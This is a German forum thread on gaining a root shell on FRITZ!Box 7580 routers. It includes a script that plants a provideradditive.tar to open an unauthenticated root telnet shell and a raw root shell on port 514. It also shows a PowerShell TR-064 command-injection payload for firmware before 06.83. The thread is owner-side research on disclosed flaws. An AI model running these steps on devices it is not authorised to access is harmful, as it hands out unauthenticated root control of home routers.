[Info] FRITZ!Box 7580 ohne Shell-Zugang ... was nun?

PeterPawn

IPPF-Urgestein
Mitglied seit
10 Mai 2006
Beiträge
15,285
Punkte für Reaktionen
1,755
Punkte
113
Nachdem hier bei mir eine 7580 (1&1) mit Firmware 06.54 eintrudelte, stand ich vor der Frage, wie ich auf diesem Gerät zu meinem ersten Shell-Zugang gelangen könnte.

Es gibt zwar die Möglichkeit, sich eine interne Version von AVM (inkl. ShellInABox und Telnet-Service) zu besorgen und diese als Update zu installieren ... das widerstrebt mir aber, weil ich einen solchen Zugang immer über den kleinstmöglichen Eingriff in das originale Gerät erhalten will, um soviel wie möglich vom ursprünglichen Zustand des Gerätes zu konservieren. Da ist die Installation einer neuen Firmware nun nicht gerade ein Eingriff, der zu dieser Intention passen würde.

Der Weg über das Ändern der "/etc/inittab" in einer yaffs2-Partition, wie er bei den VR9-Modellen i.d.R. machbar ist (so arbeitete ja "modfs-Starter"), fällt bei der 7580 und der 7560 ebenfalls aus, da diese Modelle eben keine solche Partition verwenden - dort kommt direkt ein SquashFS-Image auf dem UBI-Layer für den NAND-Flash zum Einsatz. Dieser Weg ist bei den anderen (VR9-)Modellen mit Wrapper-Partition zwar auch nicht "ganz sauber", wenn man streng nach Forensik-Regeln vorgehen will, aber zumindest kann man mit Retten alter Inhalte des yaffs2-Dateisystems die Beeinträchtigungen des Untersuchungsgegenstandes in Grenzen halten. Aber wie gesagt ... das funktioniert bei der 7580 so nicht.

Aber wie bei anderen Modellen mit NAS-Funktion gibt es natürlich auch hier die Möglichkeit, sich auf einem USB-Speicher ein entsprechendes Skript vorzubereiten und dann muß man nur noch die Frage klären (das machen wir im Anschluß), wie man die Ausführung dieses Skripts nun anstoßen könnte.

Widmen wir uns erst einmal der Frage, was es für die Installation eines Shell-Zugangs (mit kleinstmöglichem Aufwand, also ohne großes Nachladen von Binaries) braucht ... da ist ja schon seit langem bekannt, daß seitens AVM der Zugriff auf das "telnetd"-Applet der BusyBox nur durch eine zusätzliche Abfrage, ob "/usr/sbin/telnetd" existiert und ein symbolischer Link ist (wohin, ist sogar egal), verhindert wird. Hier hilft also wieder das alte Spiel, die paar Dateien in "/usr/sbin" komplett an eine beschreibbare Stelle im "tmpfs" zu kopieren und dann dieses Verzeichnis mittels der "bind"-Option über das ursprüingliche Verzeichnis "/usr/sbin" zu mounten. In dem damit nun beschreibbaren Verzeichnis kann man dann den notwendigen Symlink anlegen und dann muß man sich nur noch überlegen, auf welchem Weg man den "telnet"-Daemon nun gerne starten möchte. Dafür bietet sich zwar der passende Telefon-Code (#96*7*) auch an, aber es geht auch anders und so nutze ich hier einfach mal einen solchen anderen Weg.

Eine andere Herausforderung ist es, eine Änderung so herbeizuführen, daß diese auch nach einem Neustart der Box noch greift - u.a. auch deshalb, weil einige der möglichen RCE-Lücken (über die man das Skript dann aufrufen kann) erst im Rahmen des Neustarts der Box aufgerufen werden oder die benutzten Funktionen ihrerseits einen solchen Neustart nach sich ziehen.

Daher greife ich hier wieder auf eine bereits bekannte Lücke (die in der 06.54 noch existiert) zurück und benutze die "provideraddtive.tar" zum Start eines Telnet-Services nach jedem Neustart. Zuvor habe ich mich natürlich vergewissert, daß die verwendete FRITZ!Box nicht bereits eine "provideradditive.tar" enthält - ansonsten könnte man diese auch über die "erweiterten Support-Daten" vorher extrahieren oder sogar im Skript zuvor noch gesondert sichern (auf dem verwendeten USB-Stick), bevor man sie überschreiben läßt.

Das "fertige" Skript zum Kopieren auf den USB-Stick sieht dann so aus (im Anhang gibt es das auch noch ohne Zeilennummern, die hier nur zur besseren Orientierung enthalten sind):
Code:
  1 mkdir /var/pad
  2 cd /var/pad
  3 cat >/var/start_telnet <<'EOT'
  4 umount /usr/sbin 2>/dev/null
  5 rm -r /var/usrsbin 2>/dev/null
  6 cp -a /usr/sbin /var/usrsbin
  7 mount /var/usrsbin /usr/sbin -o bind
  8 ln -s ../../bin/busybox /usr/sbin/telnetd
  9 sed -e '/^23 /d' -e '$a23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K' /var/tmp/inetd.conf >/var/tmp/inetd.conf.new && mv /var/tmp/inetd.conf.new /var/tmp/inetd.conf && kill -HUP $(pidof inetd)
 10 echo "Telnet support initialized"
 11 EOT
 12 mv /var/tmp/inetd.conf /var/inetd.conf.bak
 13 cat >/var/tmp/inetd.conf <<'EOT'
 14 23 stream tcp6 nowait root /bin/sh sh /var/start_telnet
 15 514 stream tcp6 nowait root /bin/sh sh
 16 EOT
 17 ln -s /var v
 18 mknod node c $(sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices) 29
 19 tar -c -O v v/start_telnet v/tmp/inetd.conf >node
 20 mv /var/inetd.conf.bak /var/tmp/inetd.conf
 21 cd /
 22 rm -r /var/pad
Was passiert da nun genau?

In den Zeilen 1 und 2 wird ein Verzeichnis im beschreibbaren Speicher der FRITZ!Box angelegt und in dieses gewechselt. Von Zeile 3 bis 11 wird eine Datei "/var/start_telnet" erzeugt, die später Bestandteil der "provideradditive.tar" werden soll. Analoges erfolgt in den Zeilen 13 bis 16 für eine neue Datei "/var/tmp/inetd.conf", nachdem zuvor in Zeile 12 die existierende Datei gesichert wurde. Nachdem nun diese beiden Dateien existieren, wird in Zeile 17 ein Symlink für das "/var"-Verzeichnis erzeugt, der zusammen mit den beiden erzeugten Dateien in ein "tar"-Archiv verpackt wird, welches dann gleich in den richtigen TFFS-Node für die "provideradditive.tar" geschrieben wird. Das erfolgt in Zeile 19, nachdem dieser Node zuvor in Zeile 18 angelegt wurde. Anschließend wird noch die zuvor gesicherte Kopie der "inetd.conf" restauriert und das in Zeile 1 angelegte Verzeichnis wieder entfernt. Damit steht an dieser Stelle jetzt in der "provideradditive.tar" ein Archiv, welches beim Auspacken durch die AVM-Komponenten die Dateien "/var/start_telnet" und "/var/tmp/inetd.conf" erzeugt.

Das erfolgt dann unmittelbar beim nächsten Start des Systems und dann enthält die "inetd.conf" des Systems zunächst zwei zusätzliche Einträge, die beim Herstellen einer TCP-Verbindung auf Port 23 (das ist der Telnet-Port) oder auf Port 514 (das ist "rexec" bzw. "rcmd" und hier wird einfach eine Shell aufgerufen, die das Kommando auf STDIN ausführt und den Inhalt von STDOUT über das Netzwerk ausgibt) die Ausführung eigener Kommandos ermöglichen. Allerdings führt so ein Eintrag in der "inetd.conf" ja noch nicht zur Ausführung des dort angegebenen Kommandos ... dazu braucht es erst die eingehende TCP-Verbindung. Daher steht direkt nach dem Auspacken aus der "provideradditive.tar" für den Telnet-Service auch noch die Ausführung der Datei "/var/start_telnet" in der "inetd.conf" ... damit wird diese Datei beim ersten Verbindungsversuch gestartet. Diese führt dann die weiter oben erwähnten Aktionen aus (Kopieren des Inhalts von "/usr/sbin", Mounten des Verzeichnisses und Anlegen des Symlinks für "telnetd") und ändert anschließend den Eintrag für Port 23 dahingehend ab, daß dort direkt ein Telnet-Daemon mit einer Shell ohne jede Notwendigkeit einer Anmeldung (damit auch ohne Ausführung der "/etc/profile" und ohne Setzen des "Vom Hersteller nicht unterstützte Änderungen"-Flags) gestartet wird, bevor zuletzt noch der "inetd"-Service zum neuen Einlesen seiner Konfiguration überredet wird und für diesen ersten Verbindungsversuch die Nachricht "Telnet support initialized" zum Aufrufer geschickt wird.

Beim nächsten Aufruf eines Telnet-Clients wird dann ganz normal der Telnet-Dienst verwendet ... das ist (gerade beim Editieren von Kommandos) um einiges komfortabler als die Verwendung von "rexec" auf Port 514.

Bleibt also noch die Aufgabenstellung, dieses Skript (nachdem es auf den USB-Stick kopiert wurde) irgendwie aufzurufen ... dafür bietet sich z.B. diese Lücke an, bei der das auszuführende Kommando (in der Form "/bin/sh /var/media/ftp/usb_volume/script_name", was dann auch gleich noch das "noexec"-Flag umgeht - logischerweise an die eigenen Gegebenheiten angepaßt) in das Kennwort für den automatischen Export der Einstellungen eingebettet wird. Eine andere Alternative ist diese Lücke, bei der das auszuführende Kommando in der URL für den Download einer neuen Firmware eingebettet wird. Diese Lücke ist von AVM in der 06.83 nunmehr auch gefixt ... daher (und weil sie ohnehin nur per TR-069 (das müßte ich erst noch einmal ausführlich testen) und TR-064 ausgenutzt werden kann) spricht nichts dagegen, dafür ein passendes PowerShell-Skript zu veröffentlichen (die Policy besagt ja, nach 90 Tagen oder nach der Veröffentlichung einer korrigierten Version durch den betroffenen Hersteller).

Beide Lücken ziehen aber einen Neustart nach sich (sofern man den nicht abbricht, was aber wegen des zuvor erfolgten Aufrufs von "prepare_fwupgrade" wieder einen Heidenaufwand nach sich ziehen würde) und daher eignen sie sich wirklich nur für Kommandos, die ihrerseits eine (zumindest semi-)permanente Änderung herbeiführen, die auch nach dem Neustart noch greift.

Jedenfalls kann man dann nach dem Neustart im zweiten Verbindungsversuch problemlos eine Telnet-Session benutzen und sich die FRITZ!Box näher ansehen ... und das alles mit nur sehr marginalen Änderungen an der Firmware (praktisch wurde nur die "provideradditive.tar" hinzugefügt), die den Gegenstand der Untersuchung eben auch nur minimal verändern (anders als es eine neue Firmware mit einem Shell-Zugang machen würde - die braucht ja dann den Platz in ihrer Partition und überschreibt dort ggf. schon liegende Daten).
 

Anhänge

  • invade.sh.txt
    858 Bytes · Aufrufe: 177
Zuletzt bearbeitet:
Diese Lücke (#480894) sollte tatsächlich geschlossen sein ... es ging hier auch eher darum zu zeigen, wie man (mit wirklich nur geringen Änderungen an der Box) erst einmal den "initialen" Shell-Zugang erlangen kann (deshalb auch in der "Einführung" der Vergleich mit "modfs-Starter"). Für eine dauerhafte Lösung wäre dann wieder "modfs" (das kommt in Kürze auch wirklich für die 7580/7560) eine denkbare Lösung.

Es ist halt eine andere "Aufgabenstellung" ... ob man/ich ein Gerät von Beginn an nach Herzenslust verändern kann/darf oder ob das etwas mehr "piano" erfolgen soll, damit man den vorhergehenden Zustand wiederherstellen kann, macht hier den Unterschied aus. Mit dem über die "provideradditive.tar" eingerichteten (dauerhaften) Shell-Zugang bei der 06.54 kann man dann eben "weiter arbeiten" ... wobei ich noch gar nicht getestet habe, ob #480894 bei der 06.80 für die 7580 tatsächlich bereits gefixt war, aber der "Optik" nach ist das tatsächlich der Fall:
Code:
provider_additive/ar7.cfg
cat %s | tar xf - %s %s %s %s %s %s %s
provider_additive/startinfo.txt
provider_additive/desc.txt
provider_additive/vpn.cfg
provider_additive/user.cfg
provider_additive/tr069.cfg
provider_additive/voip.cfg
Da werden nur noch einzelne Dateien extrahiert und nicht mehr einfach alles und erst recht kein Symlink für ein anderes Verzeichnis mehr, weil auch "provider_additive" als Verzeichnis nicht gesondert extrahiert wird.

Bis zur 06.83 gibt es dann wieder #982308 - man kann ja auch (wie das früher beim "Pseudo-Image" für den Telnet-Zugang praktiziert wurde, nachdem AVM da den Neustart in "firmwarecfg" schon fest verdrahtet hatte) den fälligen Neustart nach dem Versuch des Ladens einer neuen Firmware abbrechen und die (notwendigen) Services selbst wieder starten ... auch das ist noch kein Eingriff, der das installierte System verändert bzw. hier wird sogar die Änderung der Einstellungen (im TFFS) auch noch vermieden. Aus diesem Grund würde ich auch zum Aufruf eines Kommandos jederzeit #982308 ggü. #796851 präferieren, weil letzterer zusätzlich die Änderung des hinterlegten Kennworts für den Export der Einstellungen erfordert.

Es wird sicherlich in der Zukunft auch weiterhin immer schwieriger werden, dort einfach eigene Kommandos über irgendwelche Lücken einzuschleusen (zum Glück und letzten Endes ist das ja auch das erklärte Ziel) ... inzwischen habe ich auch schon meine Schwierigkeiten, weitere offensichtliche Lücken zu finden (wenn AVM nicht neue dazubaut, was bei #796851 praktisch der Fall war).

Daher hat sich die Suche nach weiteren Schwachstellen inzwischen von den (Shell-)Skript-Dateien und Binaries im Dateisystem bzw. den Lua-Dateien für das GUI auf die von AVM bereitgestellten Schnittstellen verlagert (#982308 war eine - wiedergefundene(!) - Lücke, die bei der Suche in den TR-064-Interfaces auffiel) und erst wenn ich da nichts mehr finden kann (einige frühere Fundstellen, die ich immer "bei Gelegenheit" mal untersuchen wollte, hat AVM durch die recht konsequente Umstellung von "system"- auf "execXX"-Aufrufe auch selbst entschärft - aber das muß man dann eben auch erst noch austesten, wenn man sichergehen will), widme ich mich dem WLAN-, Telefonie- und dem AHA-Teil der Firmware - ich verwette meine Tastatur, daß sich auch da noch mindestens eine Lücke finden läßt. ;-)
 
@PeterPawn: Thanks for explaining #3

als Fan des "verstehenden Lesen" bin ich auf folgende Fragestellung gestossen:

Das erfolgt dann unmittelbar beim nächsten Start des Systems und dann enthält die "inetd.conf" des Systems zunächst zwei zusätzliche Einträge


Code:
 13 cat >/var/tmp/inetd.conf <<'EOT'
 14 23 stream tcp6 nowait root /bin/sh sh /var/start_telnet
 15 514 stream tcp6 nowait root /bin/sh sh
 16 EOT
 17 ln -s /var v
 18 mknod node c $(sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices) 29
 19 tar -c -O v v/start_telnet v/tmp/inetd.conf >node


provideradditive.tar und inetd.conf:
IMHO: für mich sieht es so aus, dass die Datei /var/tmp/inted.conf beim FB-Starten durch das Auspacken der provideradditive.tar ersetzt wird.
Nun frage ich mich, was passiert wenn die /var/tmp/inetd.conf schon NAS-Dienste (FTP, Samba) enthält, die zu starten sind ?

Beispiel:
Code:
# cat /var/tmp/inetd.conf
21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
139 stream tcp6 nowait root /sbin/smbd smbd
445 stream tcp6 nowait root /sbin/smbd smbd
#




# ls -la /etc/inetd.conf
lrwxrwxrwx    1 root     root            21 Mar 12 15:26 /etc/inetd.conf -> ../var/tmp/inetd.conf
#


werden die drei Zeilen für Port 21, 139, 445 während des Bootens nach dem Overwrite durch die provideradditive.tar noch hinzugefügt, z.B. durch RC-Skripte ?
oder sind dies NAS-Funktionen nicht mehr nutzbar ?
Habe keine FB7580 im Besitz, daher kann ich nicht selbst Testen;
 
Ist bei allen Boxen dasselbe ... die Verarbeitung der "provideradditive.tar" erfolgt recht früh beim Systemstart und die NAS-Dienste in der "inetd.conf" werden erst später (ggf. auch mehrfach, z.B. bei "hotplug/storage") hinzugefügt (die "inetd.conf" bei AVM in der "var.tar" ist i.d.R. leer und dient nur als Platzhalter).

Weil das bei AVM (zumindest bisher) in der "/bin/inetdctl" mit "grep -v" und "echo" (im Append-Modus) arbeitet, ist eben das einfache "Injizieren" eigener Services auf diesem Wege möglich.

Wenn AVM hier tatsächlich anhand anderer Flags auswerten würde, welche Dienste jeweils zur Verfügung stehen sollen und die neue "inetd.conf" auf dieser Basis "from scratch" generieren würde, dann wäre dieser Weg (der ja auch für Angreifer zur Verfügung steht und wenn die eine Weiterleitung auf die Box einrichten können, sogar von extern) auch endlich versperrt.
 
@PeterPawn: Habe ich etwas übersehen oder gibt es einen Grund warum hier der Telnetd ohne Authentifizierung configuriert wird ?

Spricht was dagegen statt "23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K"
die Anmeldung per ar7login zu verwenden, d.h. "23 stream tcp6 nowait root /bin/busybox telnetd -l /sbin/ar7login -i" in die /var/tmp/inetd.conf zu verwenden ?
 
Das siehst Du vollkommen richtig ... ich habe das oben aber auch "angerissen". Es ist ja nicht als dauerhafte Lösung gedacht, sondern als "Einstieg" in eine Shell-Session bei einer 7580 mit der derzeit ausgelieferten Firmware. Damit soll das gar nicht längerfristig auf der Box aktiv bleiben oder eine solche Box gar "unbeaufsichtigt" im LAN ihrer Arbeit nachgehen.

Damit hat dann der direkte Aufruf von "/bin/sh" den Nachteil, daß es kein explizites Benutzerkonto gibt (es wird das vom Daemon bzw. in der "inetd.conf" angegebene "vererbt") und auch kein Login, was dann erst zur Abarbeitung der "/etc/profile" führen würde.

Gleichzeitig hat er aber auch den Vorteil, daß die ansonsten vom "/sbin/ar7login" gesetzten Flags nicht angefaßt werden ... auch als "Demonstration", daß eben nicht jeder Shell-Zugang sofort die Warnlampen im FRITZ!OS angehen läßt, auch wenn man die mit dem Stein "clear_id" ja wieder auswerfen könnte.

Die Verwendung von "/bin/login" (als BusyBox-Applet ist das ja auch meist vorhanden) bräuchte dann wieder die passenden Einträge in der "/etc/passwd" bzw. "/etc/shadow" und die brauchen dann wieder zusätzliche Vorbereitungen - daher ist der direkte Aufruf von "/bin/sh" eben bequemer ... wobei das ausdrücklich nichts für eine dauerhafte Lösung ist (habe ich aber weiter oben im Thread auch schon betont, wenn ich mich richtig erinnere).
 
eine solche Box gar "unbeaufsichtigt" im LAN ihrer Arbeit nachgehen.

Ist der telnetd auf das "lan"-Interface begrenzt ?
oder "lauscht" dieser Prozess auf allen Interfaces (guest, wan) bzw. auf allen IP-Adressen auf Port 23/tcp ?

https://github.com/PeterPawn/YourFritz/tree/master/reported_threats/480894
which makes "inetd" listening on a frequently used TCP or UDP port, if no other daemon is using the port (UDP ports may be shared).
wie kann ich mir dies erklären, dass UDP-Ports geshared werden können ?
zwei Zeilen, die den gleichen Port bzw. das gleiche Programm referenzieren ? welchen Nutzwert soll das haben ?
 
Moin



Grund Individualisierung
Ausserdem kann eine eigene busybox ash wesentlich komfortabler sein, als die von AVM.
1. .ash_history :cool:
2. Lustige Escape Codes für farbige Textausgaben ala...
Code:
for i in 1 2 3 4 5 6;do echo -ne "\e[1;3${i}m${i}\e[0m";done
:rolleyes:
3. Braucht natürlich auch nicht Port: 23
4. Wie wärs mal mit: 23232 :?:
 
Zuletzt bearbeitet:
@Pokemon20021:
So für sich macht das wenig bis keinen Sinn ... man kann aber noch "Linux Socket Filtering" verwenden, um eingehende Daten gezielt einem Listener zuzuordnen, wenn auf einem Port mehrere solcher Socket-Descriptoren geöffnet sind und meine Bemerkung begann ja eigentlich auch mit "if no other daemon is using the port". Die Ergänzung mit der Möglichkeit des Sharings von UDP-Ports war mehr "der Vollständigkeit halber", damit niemand mit dem Verweis auf die Möglichkeiten von "SO_REUSE..." dann schreit: "Stimmt nicht." - ob das mit dem vorhandenen "inetd" tatsächlich geht, weiß ich nicht genau und müßte ich auch erst testen; hier ging es mehr um die theoretische Machbarkeit.

Mit den "SO_REUSE{ADDR,PORT}"-Optionen für eine solche Socket-Verbindung kann man eben mehrere Prozesse auf demselben Port und derselben Adresse "lauschen" lassen.

Ob allerdings der "inetd" der BusyBox tatsächlich eine Socket-Verbindung mit "SO_REUSEPORT" öffnet bzw. öffnen könnte, weiß ich nicht genau (der hat eine ältliche Konfiguration und andere Systeme verwenden i.d.R. den neueren und besser ausgestatteten "xinetd") ... die Bemerkung sollte mehr in die Richtung gehen, daß man z.B. seinen eigenen Prozess noch parallel auf einem Broadcast-Port (z.B. für DHCP) betreiben kann - dort sollten tatsächlich beide Listener dasselbe Paket erhalten (aber hier setzt der "inetd" dann vermutlich das notwendige Flag für den Empfang von Broadcasts wieder nicht, dann würde das auch nicht funktionieren).

Wobei ich das nicht wirklich umfassend getestet oder im Quellcode untersucht habe ... aber bei der 6490 funktioniert zumindest der Start eines Prozesses über den Port 123 (mit "123 dgram udp6 nowait root /bin/sh /var/start_telnet") für den NTP-Dienst, weil dort der ATOM-Core auf dem ARM-Core entsprechend nachfragt. Ob das jetzt allerdings wirklich parallel zum "chrony"-Prozess erfolgte (der normalerweise auf diesem Port lauschen sollte, wenn er nicht abgeschaltet wurde) oder ob der sich dort dann nicht binden konnte, solange die Zeile in der "inetd.conf" aktiv war, weiß ich nicht mehr genau ... und ich teste es jetzt auch nicht noch einmal. Das war aber der letztendliche Auslöser für diese zusätzliche Bemerkung zum Sharen von UDP-Ports (für TCP funktioniert das m.W. bei keinem "inetd", aber auch das müßte ich erst noch einmal gründlich recherchieren).

Ansonsten gibt es eigentlich kein "wan"-Interface in einer FRITZ!Box bzw. an dieses Interface können sich keine Programme direkt binden bzw. die AVM-Firewall verhindert auch für "bind everywhere"-Aufrufe von Programmen, daß eingehender Verkehr da "durchgereicht" wird. Wenn man also diesen Telnet-Daemon tatsächlich von außerhalb erreichen wollte, bräuchte es die Portweiterleitung auf der FRITZ!Box auf die eigene (LAN-)Adresse (oder zumindest eine davon) ... das ist schon an sich nicht so ganz einfach, wie wir wissen und seit der 06.80 noch einmal komplizierter zu realisieren. Abgesehen davon ist in diesem Zusammenhang ja die Frage des "login"-Programms dann wieder nebensächlich, weil die Gefahr einer "externen Anmeldung" dann ja auch bei der Verwendung irgendeines Login-Programms anstelle von "/bin/sh" bestünde.
 
Hallo zusammen,

ich bin seit Februar diesen Jahres Besitzer einer 1&1 FRITZ!Box 7580 und interessierter Mitleser in diesem Forum. Meine Versuche, die Box zu entbranden mussten aufgrund der Thematik des neuen 2017er-Bootloaders bisher leider scheitern.

Mit einer der von PeterPawn beschriebenen Lücken ist es mir nun zumindest gelungen, einen Shell-Zugang in die Box mit Firmware 6.54 zu erlangen. Nun meine Frage: Gibt es mit dem Telnet-Zugang eine Möglichkeit, das Branding auch mit neuem Bootloader dauerhaft auf AVM umzustellen?

Wenn nicht, würde ich meine Box gerne als Versuchskaninchen zum Downgrade des Bootloaders anbieten. Ich bin mir sicher dass PeterPawn oder andere versierte Foristen mit ihrem Wissen das Problem lösen könnten. Verständlicherweise hat PeterPawn aber PNs hier deaktiviert. Vielleicht findet sich ja ein Tüftler, der mir bei meinem Vorhaben behilflich sein kann?

Ich bin für jede Hilfe dankbar.

Gruß,
Bernhard
 
Zuletzt bearbeitet:
Einfach eine modifizierte Firmware verwenden, die in der "/etc/init.d/rc.conf" die Variable "OEM" nicht anhand der Daten aus dem Environment setzt, sondern fix auf "avm" baut. Das sollte an den meisten Stellen ausreichen ... es wird eigentlich überall die Variable "OEM" später ausgewertet (soweit man das mit "grep" ermitteln kann) und nicht "firmware_version".

Ich würde das jedenfalls jeder Änderung des Bootloaders vorziehen ... zwar braucht es dann für jedes Firmware-Update wieder passende Vorkehrungen, aber das ist (bei mir zumindest) ja auch noch aus anderen Gründen erforderlich.

Wer seine Box nicht zu oft neu startet, kann auch direkt am Beginn (theoretisch schon in der "/etc/inittab") einfach bei jedem Start einmal "avm" nach "firmware_version" schreiben - das sollte den anderen Wert "überlagern"; allerdings u.U. auf Kosten eines zusätzlichen TFFS-Schreibzugriffs, wobei das beim NAND-TFFS ohnehin noch einmal anders läuft.
 
Hallo zusammen,
ich habe nun auch so eine 7580er Box mit 6.81 zurzeit und wollte da auch mal testen, ob man mit der beschriebenen Methode noch einen telnet Zugang bekommt.
Irgendwie scheint es jedoch nicht zu klappen. Nach dem Ausführen des Powershell-Scripts bootet die Box, danach ist aber weder Port 23 noch Port 514 offen.
fritz7580.png
Woher kenne ich denn den Mount-Pfad vom USB-Stick?
Ist /var/media/ftp/Intenso/invade.sh vielleicht nicht richtig?
Gibt es sonst noch weitere Möglichkeiten zum Debuggen?

Danke und Grüße :)
 
Den Mountpoint des Sticks findet man natürlich jederzeit über die NAS-Funktionen der Box heraus - versieht man eine Partition mit einem vernünftigen Label (und wurde die Box mit einer frischen Konfiguration gestartet), wird auch dieser Volume-Name als Mountpoint verwendet - das gibt dann ein paar Probleme/Unwägbarkeiten, wenn man dort "FRITZ" verwendet oder irgendeinen der anderen vordefinierten Ordner im internen NAS-Speicher.

Will man wissen, ob die Funktion über TR-064 überhaupt korrekt aufgerufen wurde, erstellt man entweder die Support-Daten zum richtigen Zeitpunkt (man kann so einen Download z.B. dadurch "aufhalten", daß man dort einen externen (zur FRITZ!Box extern!) Server in der URL angibt und die Dateiübertragung in diesem Falle irgendwo mittendrin unterbricht, damit man die Support-Daten mit der aktuellen Prozessliste auslesen lassen kann) oder man macht einfach einen Netzwerk-Mitschnitt und schaut, ob ein entsprechender HTTP-Request für den Download gestartet wird. Enthält die URL dort das eingefügte Kommando, wurde es offensichtlich nicht "ausgeführt", sondern als Literal (also als Text) innerhalb der URL aufgefaßt.
 
Im Linux-Umfeld wird ja Groß/Kleinschreibung unterschieden. Meine Frage bezog sich eher auf diesen Punkt.
Ist es /var/media/ftp/Intenso/invade.sh ... oder wie es im NAS-Bereich angezeigt wird: INTENSO (also alles in Großbuchstaben)...
Nichtsdestotrotz: Beide Varianten (
/var/media/ftp/Intenso/invade.sh und /var/media/ftp/INTENSO/invade.sh) funktionieren nicht.
Die Box bootet einfach nur und es gibt danach/davor kein Telnet.
Hast Du noch eine Idee, was ich tun kann?

Versteh ich Dich richtig, dass Du sagst, ich sollte erstmal statt dem invade.sh Script ein wget auf eine externe URL ausführen lassen und dann über tcpdump am Router gucken, ob die URL tatsächlich aufgerufen wurde?
 
Das wäre eine mögliche Lösung um zu sehen, ob und wie das Kommando abgearbeitet wird.

Ich meinte allerdings mehr den Austausch der kompletten URL (an der Stelle, wo der "Server" benannt wird) für den (angeblichen) Download des neuen Firmware-Images, der (iirc) in meinem PowerShell-Skript über eine URL mit "http://fritz.box/irgendwas" erfolgen soll.

Ändert man hier das Ziel dieser URL auf etwas, was extern zur FRITZ!Box (auf der LAN-Seite am besten) ist, sollte man dort (also auf dem dann eingetragenen Server) anhand der angefragten URL (also des Pfades im GET-Request) ja auch sehen können, ob das Kommando ausgeführt wurde (dann fehlt es in der URL und wurde durch seine Ausgaben auf STDOUT ersetzt) oder ob es als reiner Text behandelt wurde, denn dann steht es 1:1 in der angeforderten URL.

Logischerweise verwendet das Linux in der Box eine Unterscheidung zwischen Groß- und Kleinschreibung, aber was die "richtige" Variante für den Verzeichnisnamen nun wäre (wenn man ihn nicht ohnehin gleich durch ein passendes Volume-Label auf etwas setzen lassen will, was man selbst steuern kann), verrät einem ja spätestens der FTP-Zugriff. Wenn da schon ein "INTENSO" als Herstellername "eingebaut" wird, hat das verwendete Volume offenbar kein Label ... das ist aber schnell (an einem anderen Rechner) gesetzt und dann braucht man auch nicht mehr raten bzw. ist nicht einmal davon betroffen, wenn AVM das Bilden des Namens aus Hersteller und Datenträgernummer betreibt und sich dabei (z.B. wegen eines zweiten Sticks) die Gerätenummer ändert.

Wenn das "INTENSO" hingegen bereits ein eigenes Label sein sollte, dann schaut das für mich eher nach FAT32-Format aus (ist aber auch nur geraten anhand der kompletten Großschreibung des Labels) und auch wenn da m.W. beim Mounten entsprechende Flags emuliert werden (ich habe schon ewig keinen FAT32-Stick mehr an einer FRITZ!Box gehabt), würde ich eher auf ein "natives" Dateisystem für Linux setzen, wenn ich mich einer FRITZ!OS-Installation "unsittlich" näher wollte.

Wobei man bei der 7580 natürlich auch komplett auf den USB-Stick verzichten könnte und das Skript gleich auf dem internen NAS-Speicher (unter /var/media/ftp direkt) ablegen könnte ... dann halt mit dem Risiko des Verlustes (sofern man keine Kopie an anderer Stelle hat), wenn man die Box irgendwie zurücksetzen muß. Da mir das bei irgendwelchen Experimenten häufiger mal so geht und dann immer die letzten Änderungen genau nicht gesichert waren, habe ich mir irgendwann mal das Arbeiten mit USB-Sticks angewöhnt ... für die reine Funktion des Aufrufs eines Shell-Skripts ist das hier aber nicht notwendig und der interne NAS-Speicher hätte dann mit dem YAFFS2 auch gleich ein Dateisystem, was Linux-Rechte "von Haus aus" unterstützt.
 
Vielen Dank nochmal für deine Tipps und Denkanstöße.
Ich war nun gerade eine Woche im Urlaub - daher gehts jetzt erst weiter mit dem Testen:

Ich habe nun das invade.sh etwas umgebaut: Es besteht lediglich aus einem
Code:
echo 'ok' > /var/media/ftp/ok.txt
Der USB-Stick ist nun erstmal nicht mehr mit im Spiel.

Leider wird auch diese ok.txt nicht erzeugt...

Nochmal ne Frage an Dich:
Weißt du, ob die Box Internetzugang braucht, während dieses "manuellen Updatevorgangs"?
Meine 7580 ist noch quasi nagelneu und hat noch nie einen Zugang nach draußen gehabt.
Daher hat die Box eben auch kein DNS und kann sich keine externen Files holen, wie beispielsweise das SOAP-Schema in deinem Powershell-Script:
Code:
$getinfo_query='<?xml version="1.0"?><s:Envelope xmlns:s="http:#schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http:#schemas.xmlsoap.org/soap/encoding/"><s:Body><u:X_AVM-DE_DoManualUpdate xmlns:u="urn:dslforum-org:service:UserInterface:1"><NewX_AVM-DE_DownloadURL>http://fritz.box/jason_boxinfo.xml$(' + $Command + ')</NewX_AVM-DE_DownloadURL><NewX_AVM-DE_AllowDowngrade>0</NewX_AVM-DE_AllowDowngrade></u:X_AVM-DE_DoManualUpdate></s:Body></s:Envelope>'
# the specified URL doesn't matter ... it's only used to start a "httpsdl" instance, which contains the injected command in the URL field
 
Internetzugang ist nicht erforderlich, weil die URL auch ins LAN zeigen darf.

Ich habe keine Ahnung, was Du da am Ende falsch machst ... wenn ich in einer 153.06.81 nachschaue, ist da jedenfalls das Problem noch vorhanden und in der 153.06.83 ist es behoben.

Wenn ich raten sollte, würde ich auf einen falschen Aufruf des Skripts auf dem NAS-Speicher tippen ... das sollte eben explizit über "/bin/sh" erfolgen, weil ansonsten andere Probleme (angefangen bei den Dateirechten, wobei der NAS-Speicher zumindest mal nicht mit "noexec" gemountet wird, wenn ich das richtig sehe in der "S15-filesys") auftreten können. Habe ich aber oben auch so beschrieben ... wenn Du Dein Vorgehen etwas ausführlicher beschreiben würdest, könnte man vermutlich auch erkennen, wo Du den Fehler machst - daß es an einem solchen von Dir liegt, stelle ich jetzt mal als These in den Raum, auch wenn ich das nur in der 06.81 nachgeschlagen habe und es damit (mangels Notwendigkeit) nicht selbst probiert habe.

Abgesehen davon lautete meine Empfehlung doch (iirc), daß Du die URL auf einen lokalen Server ändern solltest (anstelle von "fritz.box"), wo Du den HTTP-Request dann verfolgen kannst (mit einem Netzwerk-Mitschnitt oder anhand des Logs dieses Servers), oder? Was ist denn dabei herausgekommen? Es ist ja sinnvoller, das Problem systematisch einzugrenzen und nicht einfach irgendwie solange zu probieren, bis es (mehr oder weniger zufällig) dann mal klappt.
 
...
